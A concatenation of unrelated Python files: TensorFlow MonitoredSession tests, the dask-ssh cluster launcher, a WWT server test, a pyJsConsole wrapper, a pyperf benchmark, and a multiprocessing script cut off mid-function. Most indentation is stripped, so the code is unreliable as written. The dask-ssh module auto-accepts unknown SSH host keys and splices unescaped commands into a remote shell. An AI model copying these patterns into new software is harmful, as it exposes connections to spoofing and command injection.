config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]),
report_tensor_allocations_upon_oom=True),
], hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch, False)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=30000,
output_partition_graphs=True,
report_tensor_allocations_upon_oom=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
        # timeout_in_ms=60000 from the hook should override 30000 from the
        # caller.
        # output_partition_graphs=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual([
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]),
report_tensor_allocations_upon_oom=True),
], hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
@test_util.run_deprecated_v1
def test_with_statement_and_close(self):
# Test case for https://github.com/tensorflow/tensorflow/issues/12224
# where close() inside the with should have a better error message.
with self.assertRaisesRegex(RuntimeError, 'Session is already closed'):
with monitored_session.MonitoredSession() as session:
session.close()
def test_step_fn_example(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
def test_step_function_stops(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
def test_step_request_stop_without_a_with_block(self):
with ops.Graph().as_default():
was_stop_iteration_raised = False
def step_fn(step_context):
step_context.request_stop()
session = monitored_session.MonitoredSession()
try:
self.assertEqual(None, session.run_step_fn(step_fn))
except StopIteration:
was_stop_iteration_raised = True
self.assertTrue(was_stop_iteration_raised)
self.assertFalse(session.should_stop())
def test_step_request_stop_in_a_loop(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
while not session.should_stop():
_ = session.run_step_fn(step_fn)
self.fail('An exception should be raised on the line above.')
def test_step_request_stop_with_returning_a_type(self):
with ops.Graph().as_default():
def step_fn(step_context):
del step_context
return 'a type'
with monitored_session.MonitoredSession() as session:
self.assertEqual('a type', session.run_step_fn(step_fn))
def test_step_with_extra_arguments(self):
with ops.Graph().as_default():
def step_fn(step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegex(
ValueError,
'`step_fn` may either have one `step_context` argument'):
self.assertEqual(None, session.run_step_fn(step_fn))
def test_step_fn_belongs_to_a_class(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
class Model(object):
def step_fn(self, step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
model = Model()
self.assertNear(3.2, session.run_step_fn(model.step_fn), 0.1)
def test_step_fn_belongs_to_a_class_and_has_extra_methods(self):
with ops.Graph().as_default():
class Model(object):
def step_fn(self, step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegex(
ValueError,
'`step_fn` may either have one `step_context` argument'):
model = Model()
self.assertEqual(None, session.run_step_fn(model.step_fn))
def test_step_fn_with_hooks(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
# This test highlights the interaction of hooks with
      # `MonitoredSession.run_step_fn`. The order of execution of operations
# below is:
# 0. stage_0
# 1. stage_1_0 or stage_1_1 in an undefined order
# 2. stage_2
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
# The order of `stage_1_0` and `stage_1_1` is undefined by
# `MonitoredSession`, but we should be able to assert when both of them
# are complete. To obtain a consistent result of adding two different
# constants to `var`, we rely on a control dependency and
# `ResourceVariable`. Otherwise, it is possible that one of the
# additions overwrites the result of the other addition.
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.MonitoredSession(hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_has_the_same_hooks_behavior_without_recovery(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.SingularMonitoredSession(
hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_with_hooks_and_request_stop(self):
with ops.Graph().as_default():
trace_the_hook = {'before_run': False, 'after_run': False}
class Hook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
trace_the_hook['before_run'] = True
def after_run(self, run_context, run_values):
trace_the_hook['after_run'] = True
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession(hooks=[Hook()]) as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
# `step_context.request_stop()` in a step_fn interrupts the flow of
# running the hooks.
self.assertFalse(trace_the_hook['before_run'])
self.assertFalse(trace_the_hook['after_run'])
def test_recovers_from_an_exception_in_step_fn(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
def test_recovers_from_an_exception_in_step_fn_after_hooks(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return value
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session)) as session:
session.run(variables.global_variables_initializer())
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
# Make sure the rest of the body of the step_fn is re-executed upon
# AbortedError:
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
def test_step_fn_doesnt_recover_when_it_wasnt_asked_to(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.SingularMonitoredSession() as session:
with self.assertRaisesRegex(errors_impl.AbortedError, 'Abort'):
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.fail()
self.assertTrue(trace_the_exception['run_already'])
def test_step_fn_exception_from_before_run(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
vv = constant_op.constant(3.2)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return session_run_hook.SessionRunArgs(fetches=vv)
def after_run(self, run_context, run_values):
self._testing.assertNear(3.2, run_values.results, 0.1)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
return step_context.run_with_hooks(fetches=v, feed_dict={c: 1.3})
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session),
hooks=[Hook(self)]) as session:
test_session.run(variables.global_variables_initializer())
self.assertNear(1.3, session.run_step_fn(step_fn), 0.1)
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.SingularMonitoredSession() as session:
        # If it's not initialized, the following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that the session closes cleanly when no exception is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
ssh.py
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
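# For example (hypothetical usage, not present in the original module), the
# labels below wrap text in one of these codes and close it with ENDC:
#   print(bcolors.FAIL + 'worker exited unexpectedly' + bcolors.ENDC)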
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger('paramiko').setLevel(logging.WARN)
ssh.connect(hostname=cmd_dict['address'],
username=cmd_dict['ssh_username'],
port=cmd_dict['ssh_port'],
key_filename=cmd_dict['ssh_private_key'],
compress=True,
timeout=20,
banner_timeout=20) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException,
PasswordRequiredException) as e:
print('[ dask-ssh ] : ' + bcolors.FAIL +
                  'SSH connection error when connecting to {addr}:{port} '
'to run \'{cmd}\''.format(addr=cmd_dict['address'],
port=cmd_dict['ssh_port'],
cmd=cmd_dict['cmd']) + bcolors.ENDC)
print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print('[ dask-ssh ] : '
+ bcolors.FAIL
+ 'SSH connection failed after 3 retries. Exiting.'
+ bcolors.ENDC)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(' ' + bcolors.FAIL +
'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
bcolors.ENDC)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
cmd=cmd_dict['cmd']))
stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug('stdout from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
output=line))
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug('stderr from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL +
"remote process exited with exit status " +
str(exit_status) + bcolors.ENDC)
return True
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict['input_queue'].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b'\x03') # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
python=remote_python or sys.executable, port=port, logdir=logdir)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
port=port, logdir=logdir)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (bcolors.BOLD +
'scheduler {addr}:{port}'.format(addr=addr, port=port) +
bcolors.ENDC)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
ssh_username, ssh_port, ssh_private_key, nohost, remote_python=None):
cmd = ('{python} -m distributed.cli.dask_worker '
'{scheduler_addr}:{scheduler_port} '
'--nthreads {nthreads} --nprocs {nprocs}')
if not nohost:
cmd += ' --host {worker_addr}'
cmd = cmd.format(
python=remote_python or sys.executable,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
        cmd += '&> {logdir}/dask_worker_{addr}.log'.format(
addr=worker_addr, logdir=logdir)
label = 'worker {addr}'.format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
ssh_username=None, ssh_port=22, ssh_private_key=None,
nohost=False, logdir=None, remote_python=None):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
print(bcolors.WARNING + 'Output will be redirected to logfiles '
'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
+ bcolors.ENDC)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(logdir, scheduler_addr,
scheduler_port, ssh_username, ssh_port,
ssh_private_key, remote_python)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process['output_queue'].empty():
print(process['output_queue'].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(start_worker(self.logdir, self.scheduler_addr,
self.scheduler_port, address,
self.nthreads, self.nprocs,
self.ssh_username, self.ssh_port,
self.ssh_private_key, self.nohost,
self.remote_python))
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process['input_queue'].put('shutdown')
process['thread'].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
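# Example usage (a minimal sketch, not part of dask-ssh itself): start a
# scheduler and two workers over SSH and stream their output until interrupted.
# The addresses, username and key path below are hypothetical placeholders and
# assume passwordless SSH access to each machine.
if __name__ == '__main__':
    cluster = SSHCluster(scheduler_addr='192.168.0.10', scheduler_port=8786,
                         worker_addrs=['192.168.0.11', '192.168.0.12'],
                         nthreads=4, nprocs=1,
                         ssh_username='dask', ssh_private_key='/home/dask/.ssh/id_rsa',
                         logdir='/tmp/dask-ssh-logs')
    try:
        # Echo remote stdout/stderr until Ctrl-C, then tear everything down.
        cluster.monitor_remote_processes()
    finally:
        cluster.shutdown()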
|
test_server.py
|
# -*- mode: python; coding: utf-8 -*-
# Copyright 2020 the .NET Foundation
# Licensed under the MIT License.
from __future__ import absolute_import, division, print_function
from argparse import Namespace
from http.server import HTTPServer
import pytest
import requests
from threading import Thread
from time import sleep
from . import test_path
from .. import folder, server
TIMEOUT = 120
class TestRunServer(object):
@classmethod
def setup_class(cls):
cls.server_port = 33007 # just hope it's not taken
settings = Namespace()
settings.port = cls.server_port
settings.root_dir = test_path()
# Note: there can be a race condition between server startup and the
# execution of the tests. There doesn't seem to be any mechanism to
# enable the tests to rigorously wait for the server to be fully started
# up.
cls.thread = Thread(target=lambda: server.run_server(settings))
        cls.thread.daemon = True
cls.thread.start()
# In an attempt to help mitigate the above issue, set up requests to
# retry requests if they fail. This is hardly expected to help since if
# the server isn't yet running, the failures and retries will occur
# instantly, but it's not bad to have an example of the pattern anyway.
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
retry_strategy = Retry(
total=10,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
cls.session = requests.Session()
cls.session.mount("https://", adapter)
cls.session.mount("http://", adapter)
def test_wtml_rewrite(self):
base_url = "http://localhost:{}/".format(self.server_port)
# More race condition mitigation
for attempt in range(10):
try:
f = folder.Folder.from_url(
base_url + "test1.wtml", timeout=TIMEOUT, session=self.session
)
break
except requests.ConnectionError:
sleep(5)
assert f.children[0].thumbnail == base_url + "thumb.jpg"
class TestPreviewWtml(object):
"""
This is basically a smoketest to get code coverage of the preview function.
"""
@classmethod
def setup_class(cls):
cls.opened_url = None
import webbrowser
class DummyBrowser(object):
def open(self, url, **kwargs):
cls.opened_url = url
webbrowser.register("wwtdummy", DummyBrowser)
# Note: there can be a race condition between server startup and the
# execution of the tests. There doesn't seem to be any mechanism to
# enable the tests to rigorously wait for the server to be fully started
# up.
cls.thread = Thread(
target=lambda: server.preview_wtml(
test_path("test1_rel.wtml"), browser="wwtdummy"
)
)
        cls.thread.daemon = True
cls.thread.start()
# In an attempt to help mitigate the above issue, set up requests to
# retry requests if they fail. This is hardly expected to help since if
# the server isn't yet running, the failures and retries will occur
# instantly, but it's not bad to have an example of the pattern anyway.
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
retry_strategy = Retry(
total=10,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
cls.session = requests.Session()
cls.session.mount("https://", adapter)
cls.session.mount("http://", adapter)
def test_preview(self):
for attempt in range(10):
if self.opened_url is not None:
break
sleep(5)
assert "_rel" not in self.opened_url
def test_smoke():
"""Dumb smoketest."""
server_address = ("", 0)
with HTTPServer(server_address, server.WWTRequestHandler) as httpd:
pass
|
__init__.py
|
"""
pyJsConsole wrapper.
© Anime no Sekai - 2020
"""
from .internal.javascript import classes as JSClass
console = JSClass._Console()
document = JSClass._Document()
history = JSClass._History()
Math = JSClass._Math()
navigator = JSClass._Navigator()
screen = JSClass._Screen()
window = JSClass._Window()
browser = JSClass.BrowserObject
'''
import threading
from lifeeasy import sleep
def reloadElements():
global document
global window
lastURL = 'data:,'
while True:
sleep(0.1)
try:
if JSClass.evaluate('window.location.href') != lastURL:
document = JSClass._Document()
window = JSClass._Window()
lastURL = JSClass.evaluate('window.location.href')
except:
break
thread = threading.Thread(target=reloadElements)
thread.daemon = True
thread.start()
'''
def newDocument():
return JSClass._Document()
def newWindow():
return JSClass._Window()
def newHistory():
return JSClass._History()
def fresh():
return (JSClass._Document(), JSClass._Window(), JSClass._History())
def clearInterval(intervalID):
JSClass.clearInterval(intervalID)
def clearTimeout(timeoutID):
JSClass.clearTimeout(timeoutID)
def evaluate(code_to_execute, return_value=False):
return JSClass.evaluate(code_to_execute, return_value=return_value)
def setInterval(function, milliseconds):
return JSClass.setInterval(function, milliseconds)
def setTimeout(function, milliseconds):
return JSClass.setTimeout(function, milliseconds)
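# Example usage (a hedged sketch, not part of the package itself; it assumes the
# internal driver has a live browser session and that setTimeout accepts a
# Python callable):
#
#     title = evaluate('document.title', return_value=True)
#     timer_id = setTimeout(lambda: print('fired'), 1000)
#     clearTimeout(timer_id)
#     document, window, history = fresh()  # re-bind wrappers after navigation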
|
bm_2to3.py
|
from mpkmemalloc import *
import threading
import glob
import os.path
import sys
import pyperf
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner()
runner.metadata['description'] = "Performance of the Python 2to3 program"
args = runner.parse_args()
datadir = os.path.join(os.path.dirname(__file__), 'data', '2to3')
pyfiles = glob.glob(os.path.join(datadir, '*.py.txt'))
command = [sys.executable, "-m", "lib2to3", "-f", "all"] + pyfiles
runner.bench_command('2to3', command)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
return(result)
# if __name__ == '__main__':
# gc.disable()
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
Multiprocessing_While.py
|
# _*_coding : UTF_8 _*_
# Author : Xueshan Zhang
# Date : 2022/1/11 12:08 AM
# File : Multiprocessing_While.py
# Tool : PyCharm
import datetime, time
from multiprocessing import Process
import logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s: %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='logging.log',
filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(filename)s : %(levelname)s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
log = logging.getLogger(__name__)
def worker(name, sleep=2):
logging.info(f"Worker '{name}': {sleep} s.")
time.sleep(sleep)
logging.info(f"Worker '{name}': done.")
def boss(name, sleep=4):
logging.info(f"Boss '{name}': {sleep} s.")
time.sleep(sleep)
logging.info(f"Boss '{name}': done.")
def proStatus(con, pro):
    info = [pro.is_alive(), pro.exitcode]
    expected = {
        'initial': [False, None],
        'start': [True, None],
        'stop': [False, 0],
    }
    if con in expected.keys():
